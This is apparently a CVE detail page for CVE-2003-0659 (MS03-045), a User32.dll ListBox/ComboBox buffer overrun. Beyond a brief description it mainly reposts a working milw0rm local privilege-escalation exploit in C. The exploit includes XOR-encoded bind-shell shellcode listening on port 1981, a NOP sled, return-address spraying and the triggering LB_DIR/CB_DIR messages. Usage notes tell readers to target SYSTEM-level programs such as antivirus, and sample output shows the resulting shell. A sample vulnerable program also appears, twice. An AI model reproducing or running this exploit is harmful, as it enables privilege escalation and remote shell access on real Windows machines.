CVE-2003-0659 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

source: https://www.securityfocus.com/bid/8827/info Microsoft has reported the existence of a local buffer overrun vulnerability in an undisclosed User32.dll library function. This function is used by applications implementing the use of ListBox or ComboBox controls and will be triggered when the program encounters specific types of Windows messages. This issue poses a security risk when a privileged application is running in the environment of an unprivileged user. Due to the ability for a program to transmit a windows message to another process, an attacker may be capable of exploiting this buffer overrun to gain privileged access to a system. // vuln.cpp : Defines the entry point for the application. // #include "stdafx.h" #include <windows.h> LRESULT CALLBACK WndProc(HWND hwnd , UINT msg , WPARAM wp , LPARAM lp) { static HWND list; static HWND rich; switch (msg) { case WM_DESTROY: PostQuitMessage(0); return 0; case WM_CREATE: list = CreateWindow( TEXT("LISTBOX") , NULL , WS_CHILD | WS_VISIBLE | LBS_STANDARD , 0 , 0 , 300 , 300 , hwnd , (HMENU)1 , ((LPCREATESTRUCT)(lp))->hInstance , NULL ); rich = CreateWindow("EDIT", // predefined class NULL, // no window title WS_CHILD | WS_VISIBLE | WS_VSCROLL | ES_LEFT | ES_MULTILINE | ES_AUTOVSCROLL, 300, 300, 100, 100, // set size in WM_SIZE message hwnd, // parent window (HMENU) 1, // edit control ID (HINSTANCE) GetWindowLong(hwnd, GWL_HINSTANCE), NULL); return 0; } return DefWindowProc(hwnd , msg , wp , lp); } int WINAPI WinMain(HINSTANCE hInstance , HINSTANCE hPrevInstance , PSTR lpCmdLine , int nCmdShow ) { HWND hwnd; MSG msg; WNDCLASS winc; winc.style = CS_HREDRAW | CS_VREDRAW; winc.lpfnWndProc = WndProc; winc.cbClsExtra = winc.cbWndExtra = 0; winc.hInstance = hInstance; winc.hIcon = LoadIcon(NULL , IDI_APPLICATION); winc.hCursor = LoadCursor(NULL , IDC_ARROW); winc.hbrBackground = (HBRUSH)GetStockObject(WHITE_BRUSH); winc.lpszMenuName = NULL; winc.lpszClassName = TEXT("KITTY"); if (!RegisterClass(&winc)) return -1; hwnd = CreateWindow( TEXT("KITTY") , TEXT("Kitty on your lap") , WS_OVERLAPPEDWINDOW | WS_VISIBLE , CW_USEDEFAULT , CW_USEDEFAULT , CW_USEDEFAULT , CW_USEDEFAULT , NULL , NULL , hInstance , NULL ); if (hwnd == NULL) return -1; while(GetMessage(&msg , NULL , 0 , 0)) { TranslateMessage(&msg); DispatchMessage(&msg); } return msg.wParam; }

/* \ local ListBox/ComboBox exploit for Win32 / \ Created by xCrZx crazy_einstein yahoo com /11.11.03/ / \ Usage: MS03-045.exe <-t target> [-r return address] / \ there is two targets: CB_DIR (for ComboBox), LB_DIR (for ListBox). / \ As to return address it should be such as 0x0000XXYY / (and you should know that this address will be transformed \ into unicode! And if XX and YY bytes <128 it will maintained! / And return address will be such as 0x00XX00YY! \ If not it will be coded in two bytes each of this bytes and / return will be looked like 0xZZZZWWWW) \ / To figure out handle addresses you can use tools such as \ Spy++ (default tool contained in MSVC++ 6.0) / \ Note: there is no so easy exploitation of this stuff! / first of all you should figure out the handle \ addresses of ListBox/ComboBox & EDIT,RichEdit,etc / (to store shellcode inside of it.. you can also \ store shellcode by diffrent way into variables of / vuln program (i.e. through fopen(),argv,etc..) \ / \ yesh yesh y0...check it out y0... / wu-tang clan forever :) \ / greetzz to: tANDm :), Billi_k1d, alph4, btr, hhs, v1pee, ni69az, \ akid, Joel Eriksson, andrewg, Amour and others... / \ tested on WinXP (also should work on others Win32) / \ p.s. use can find vuln program with SYSTEM privileges (antivirus,firewall,etc) / to obtain the SYSTEM privileges \ */ /* \ / example of work: \ ----------------- / \ vuln program: / \ C:\...ual Studio\MyProjects\vuln\Debug>vuln.exe / \ / C:\...ual Studio\MyProjects\vuln\Debug> \ / \ ------- / \ exploit: / \ C:\MSVCSTAFF\Debug>85boom.exe -t 0 / \ [MS03-045 local exploit by xCrZx /11.11.03/] / \ Enter addresses of the program handles: / <handle of Edit/RichEdit/etc (to store shellcode)> <handle of ListBox/ComboBox> \ (i.e. "00450ca1 0066345c") -> 1e01f6 2701a2 / \ [+] Set shellcode! / --> Using LB_DIR command \ --> Using return address = 0x1515 / [+] Set return addresses! \ [+] Sending shellcode message! / [+] Sending exploit message! Try to connect on 1981 port after 5 sec! \ / \ -------- / \ Microsoft Telnet> open localhost 1981 / \ ... / \ Microsoft Windows XP [‚¥àá¨ï 5.1.2600] / (‘) Š®à¯®à æ¨ï Œ ©ªà®á®äâ, 1985-2001. \ / C:\Program Files\Microsoft Visual Studio\MyProjects\vuln\Debug> \ */ #include <windows.h> #include <stdio.h> #include <tchar.h> char shellcode[] = //bind on 1981 "\xEB\x0F\x5B\x80\x33\x93\x43\x81\x3B\x45\x59\x34\x53\x75\xF4\x74" "\x05\xE8\xEC\xFF\xFF\xFF" //sc_bind_1981 for 2k/xp/2003 by ey4s //speacial version for ws_ftp base on v1.03.10.07 //XOR with 0x93 (367 0x16F bytes) "\x12\x7F\x93\x91\x93\x93\x7A\xA4\x92\x93\x93\xCC\xF7\x32\xA3\x93" "\x93\x93\x18\xD3\x9F\x18\xE3\x8F\x3E\x18\xFB\x9B\xF9\x97\xCA\x7B" "\x4A\x93\x93\x93\x71\x6A\xFB\xA0\xA1\x93\x93\xFB\xE4\xE0\xA1\xCC" "\xC7\x6C\xC4\x6F\x18\x7B\xF9\x95\xCA\x7B\x2C\x93\x93\x93\x71\x6A" "\x12\x7F\x03\x92\x93\x93\xC7\xFB\x91\x91\x93\x93\x6C\xC4\x7B\xC3" "\xC3\xC3\xC3\xF9\x92\xF9\x91\x6C\xC4\x63\x18\x4B\x18\x7F\x54\xD6" "\x93\x91\x93\x94\x2E\xA0\x53\x1A\xD6\x97\xF9\x83\xC6\xC0\x6C\xC4" "\x67\xC0\xF9\x92\xC0\x6C\xC4\x6B\xC3\xC3\xC0\x6C\xC4\x6F\xC3\x10" "\x7F\xCB\x18\x67\xA0\x48\xF9\x83\xCA\x1A\x8F\x1D\x71\x68\x78\xBF" "\xD3\xD3\xD3\xD3\xD3\xD3\xD3\xD3\xD3\xD3\xD3\xD3\xD3\xD3\xD3\xD3" "\xD3\xD3\xD3\xD3\x03\x03\x03\x03\xD3\xD3\xD3\xD3\xD3\xD3\xD3\xD3" "\xE9\x35\xFF\xFF\xFF\xD3\xD3\xD3\xD3\xD3\xD3\xD3\x1A\xD5\xAB\x1A" "\xD5\xAF\x1A\xD5\xD3\x54\xD5\xBF\x92\x92\x93\x93\x1E\xD5\xD7\xC3" "\xC5\xC0\xC0\xC0\xF9\x92\xC0\xC0\x1E\xD5\xC7\x54\x93\xF0\xFE\xF7" "\x93\xC3\xC0\x6C\xC4\x73\xA0\x53\xDB\xC3\x6C\xE5\xD7\x6C\xC4\x4F" "\x10\x57\xCB\x6C\xC4\x7F\x6C\xC4\x7F\xC3\x6C\xC4\x4B\xC2\x18\xE6" "\xAF\x18\xE7\xBD\xEB\x90\x66\xC5\x18\xE5\xB3\x90\x66\xA0\x5A\xDA" "\xD2\x3E\x90\x56\xA0\x48\xA0\x41\x9C\x2D\x83\xA9\x45\xE7\x9B\x52" "\x58\x88\x90\x49\xD3\x78\x7C\xA8\x8C\xE6\x76\xCD\x18\xCD\xB7\x90" "\x4E\xF5\x18\x9F\xD8\x18\xCD\x8F\x90\x4E\x18\x97\x18\x90\x56\x38" "\xCA\x50\x7B\x57\x6D\x6C\x6C\x7A\x28\x50\x3D\x27\xEE\x86\x0B\x58" "\xD1\xE4\x2B\x4F\x4E\x89\xA0\xBE\x87\xC5\x3D\x55\xB8\x2E\xBD\x4D" "\xC4\xE1\x37\xB7\x21\xA1\x93\x9D\xCE\x58\x4D\xE7\xB1\xF0\x5B" //decode end sign "\x45\x59\x34\x53"; #define SIZE 60000 int main(int argc, char **argv) { HWND target=(HWND)0x240302; HWND target2; char buf[SIZE+5]; char b0000[30000]; long ret=0x00001515; int trigger=0; printf("\n[MS03-045 local exploit by xCrZx /11.11.03/]\n\n"); if(argc==1) { printf( "Usage: %s <-t N> [-r return address]\n\n" "N targets (-t option):\n\n\t0 - LB_DIR\n\t1 - CB_DIR\n\n" ,argv[0]); exit(0); } for(int j=0;j<argc;j++) { if(strcmp(argv[j],"-t")==NULL) { trigger = atoi(argv[j+1]); } if(strcmp(argv[j],"-r")==NULL) { ret = strtoul(argv[j+1],0,16); } } printf("Enter addresses of the program handles:\n<handle of Edit/RichEdit/etc (to store shellcode)> <handle of ListBox/ComboBox>\n(i.e. \"00450ca1 0066345c\") -> ");fflush(stdout); scanf("%x %x",&target2,&target); memset(buf,0x00,sizeof buf); memset(b0000,0x00,sizeof b0000); printf("\n[+] Set shellcode!\n"); memset(b0000,0x90,sizeof(b0000)-strlen(shellcode)-1); memcpy(b0000+strlen(b0000),&shellcode,strlen(shellcode)); printf("--> Using %s command\n",(trigger)?("CB_DIR"):("LB_DIR")); printf("--> Using return address = 0x%x\n",ret); printf("[+] Set return addresses!\n"); for(int i=0;i<SIZE/4;i++) *(long *)&buf[strlen(buf)]=ret; printf("[+] Sending shellcode message!\n"); SendMessage(target2,WM_SETTEXT,0,(LPARAM)b0000); printf("[+] Sending exploit message! Try to connect on 1981 port after 5 sec!\n"); SendMessage(target , (trigger)?(CB_DIR):(LB_DIR) , DDL_READWRITE | DDL_DIRECTORY | DDL_DRIVES , (LPARAM)buf ); return 0; } ------------------------------------------------------------------------------------------------------------ // zzz.cpp : Defines the entry point for the application. // #include "stdafx.h" #include <windows.h> LRESULT CALLBACK WndProc(HWND hwnd , UINT msg , WPARAM wp , LPARAM lp) { static HWND list; static HWND rich; switch (msg) { case WM_DESTROY: PostQuitMessage(0); return 0; case WM_CREATE: list = CreateWindow( TEXT("LISTBOX") , NULL , WS_CHILD | WS_VISIBLE | LBS_STANDARD , 0 , 0 , 300 , 300 , hwnd , (HMENU)1 , ((LPCREATESTRUCT)(lp))->hInstance , NULL ); rich = CreateWindow("EDIT", // predefined class NULL, // no window title WS_CHILD | WS_VISIBLE | WS_VSCROLL | ES_LEFT | ES_MULTILINE | ES_AUTOVSCROLL, 300, 300, 100, 100, // set size in WM_SIZE message hwnd, // parent window (HMENU) 1, // edit control ID (HINSTANCE) GetWindowLong(hwnd, GWL_HINSTANCE), NULL); return 0; } return DefWindowProc(hwnd , msg , wp , lp); } int WINAPI WinMain(HINSTANCE hInstance , HINSTANCE hPrevInstance , PSTR lpCmdLine , int nCmdShow ) { HWND hwnd; MSG msg; WNDCLASS winc; winc.style = CS_HREDRAW | CS_VREDRAW; winc.lpfnWndProc = WndProc; winc.cbClsExtra = winc.cbWndExtra = 0; winc.hInstance = hInstance; winc.hIcon = LoadIcon(NULL , IDI_APPLICATION); winc.hCursor = LoadCursor(NULL , IDC_ARROW); winc.hbrBackground = (HBRUSH)GetStockObject(WHITE_BRUSH); winc.lpszMenuName = NULL; winc.lpszClassName = TEXT("KITTY"); if (!RegisterClass(&winc)) return -1; hwnd = CreateWindow( TEXT("KITTY") , TEXT("Kitty on your lap") , WS_OVERLAPPEDWINDOW | WS_VISIBLE , CW_USEDEFAULT , CW_USEDEFAULT , CW_USEDEFAULT , CW_USEDEFAULT , NULL , NULL , hInstance , NULL ); if (hwnd == NULL) return -1; while(GetMessage(&msg , NULL , 0 , 0)) { TranslateMessage(&msg); DispatchMessage(&msg); } return msg.wParam; } // milw0rm.com [2003-11-14]